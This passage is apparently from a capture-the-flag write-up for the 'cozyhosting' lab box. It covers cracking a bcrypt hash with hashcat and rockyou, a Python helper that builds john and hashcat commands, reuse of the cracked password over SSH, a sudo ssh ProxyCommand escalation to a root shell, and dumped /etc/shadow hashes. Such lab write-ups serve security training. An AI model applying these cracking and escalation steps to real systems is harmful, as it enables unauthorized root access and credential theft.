https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Sun Sep 3 05:51:43 2023 (20 secs)
Time.Estimated...: Tue Sep 5 07:38:20 2023 (2 days, 1 hour)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 80 H/s (6.77ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 1472/14344385 (0.01%)
Rejected.........: 0/1472 (0.00%)
Restore.Point....: 1472/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:640-648
Candidate.Engine.: Device Generator
Candidates.#1....: maurice -> mexico1
Hardware.Mon.#1..: Util: 64%
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Sun Sep 3 05:51:43 2023 (48 secs)
Time.Estimated...: Sun Sep 3 05:52:31 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 60 H/s (5.03ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2816/14344385 (0.02%)
Rejected.........: 0/2816 (0.00%)
Restore.Point....: 2752/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: bebito -> medicina
Hardware.Mon.#1..: Util: 71%
Started: Sun Sep 3 05:50:20 2023
Stopped: Sun Sep 3 05:52:32 2023
Cracked in under three minutes (48 seconds of actual cracking; the password sits near the top of rockyou, progress was 2816 of 14344385 candidates).
manchesterunited
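Hash triage done properly, as an added example (my code, not from the writeup, john or hashcat): read the modular-crypt-format prefix instead of guessing, derive the cost, build the cracker command lines with the wordlist passed the way each tool expects, and size the job before starting it. The hashes are the ones on this page (the bcrypt admin hash above and the yescrypt shadow line dumped at the very end); the rate and wordlist size for the estimate are the figures hashcat printed above. The hashcat mode numbers and john format names come from the tools' documentation; the yescrypt entry assumes a john built against a libxcrypt that supports it.

```python
"""Identify crypt-style hashes and build the right john / hashcat invocations."""

ADMIN_BCRYPT = "$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm"
SHADOW_LINE = ("root:$y$j9T$nK3A0N4wTEzopZkv8GQds0$NlR46AiiQOChoO1UNpiOYFIBHM7s956G8l8p/w15Sp2"
               ":19577:0:99999:7:::")

# MCF identifier -> (algorithm, hashcat -m, john --format).
FORMATS = {
    "2a": ("bcrypt", 3200, "bcrypt"),
    "2b": ("bcrypt", 3200, "bcrypt"),
    "2y": ("bcrypt", 3200, "bcrypt"),
    "y": ("yescrypt", None, "crypt"),      # no hashcat mode in 6.2.6; john via system crypt(3)
    "6": ("sha512crypt", 1800, "sha512crypt"),
    "5": ("sha256crypt", 7400, "sha256crypt"),
    "1": ("md5crypt", 500, "md5crypt"),
}


def identify(h: str) -> dict:
    """Algorithm, cracker settings and work factor from the $id$ prefix."""
    fields = h.split("$")
    if len(fields) < 4 or fields[0] != "":
        raise ValueError("not a modular-crypt-format hash")
    if fields[1] not in FORMATS:
        raise ValueError(f"unknown identifier ${fields[1]}$")
    name, mode, fmt = FORMATS[fields[1]]
    info = {"name": name, "hashcat_mode": mode, "john_format": fmt, "cost": None, "iterations": None}
    if name == "bcrypt":
        info["cost"] = int(fields[2])               # $2a$10$ -> cost 10
        info["iterations"] = 2 ** info["cost"]      # john reports this as "Cost 1 (iteration count)"
    elif name == "yescrypt":
        info["cost"] = fields[2]                    # packed N/r/p parameters, e.g. "j9T"
    elif name in ("sha512crypt", "sha256crypt"):
        info["iterations"] = 5000                   # default unless rounds= is present
        if fields[2].startswith("rounds="):
            info["iterations"] = int(fields[2][len("rounds="):])
    return info


def parse_shadow_line(line: str):
    """(user, hash) from an /etc/shadow record."""
    user, h = line.split(":", 2)[:2]
    return user, h


def hashcat_argv(hash_file: str, wordlist: str, info: dict) -> list:
    if info["hashcat_mode"] is None:
        raise ValueError(f"hashcat has no mode for {info['name']}; use john")
    return ["hashcat", "-m", str(info["hashcat_mode"]), "-a", "0", hash_file, wordlist]


def john_argv(hash_file: str, wordlist: str, info: dict) -> list:
    # --wordlist= is mandatory: a bare second path is loaded as another hash file.
    return ["john", f"--format={info['john_format']}", f"--wordlist={wordlist}", hash_file]


def eta_seconds(wordlist_size: int, rate_hps: float, rules: int = 1) -> float:
    """Worst case for a straight wordlist attack at the measured rate."""
    return wordlist_size * rules / rate_hps


if __name__ == "__main__":
    info = identify(ADMIN_BCRYPT)
    print(info)
    print(" ".join(hashcat_argv("hash2", "/usr/share/wordlists/rockyou.txt", info)))
    print(" ".join(john_argv("hash2", "/usr/share/wordlists/rockyou.txt", info)))
    print(f"full rockyou at 80 H/s: {eta_seconds(14344385, 80) / 86400:.1f} days")
    user, h = parse_shadow_line(SHADOW_LINE)
    print(user, identify(h))
```

At 80 H/s the whole of rockyou is a two-day job, which is the ETA hashcat showed; bcrypt at cost 10 is slow by design, so the order of candidates matters far more than raw speed, and a small targeted list (or rockyou-75, passed correctly) is the first thing to try.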
**SSH login**
The cracked password manchesterunited is reused for the local account josh, so log in over SSH as josh.
root
Refer: https://gtfobins.github.io/gtfobins/ssh/#sudo
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
josh@cozyhosting:~$ sudo /usr/bin/ssh ;bash -i
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]
[-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
[-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]
[-i identity_file] [-J [user@]host[:port]] [-L address]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-Q query_option] [-R address] [-S ctl_path] [-W host:port]
[-w local_tun[:remote_tun]] destination [command [argument ...]]
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
#
# cd /root
# ls
root.txt
# cat root.xt
cat: root.xt: No such file or directory
# cat root.xt
cat: root.xt: No such file or directory
# cat root.txt
That privesc is about as direct as it gets: sudo allows /usr/bin/ssh with any arguments, and ssh hands ProxyCommand to a shell with -c before it ever connects, so ;sh 0<&2 1>&2 starts a root shell wired to the terminal through stderr (ssh keeps stderr attached to the tty, which is why stdin and stdout are redirected to fd 2). A sudo rule that lets a user pass arbitrary ssh options (-o, -F) is equivalent to granting root.
root:$y$j9T$nK3A0N4wTEzopZkv8GQds0$NlR46AiiQOChoO1UNpiOYFIBHM7s956G8l8p/w15Sp2:19577:0:99999:7:::
josh:$y$j9T$QbN44OK6RyyP01EL9VkVU0$n/uszgmCRdbeaF9OiCVna63BwZCtG.SLHXEXVeluy.1:19498:0:99999:7:::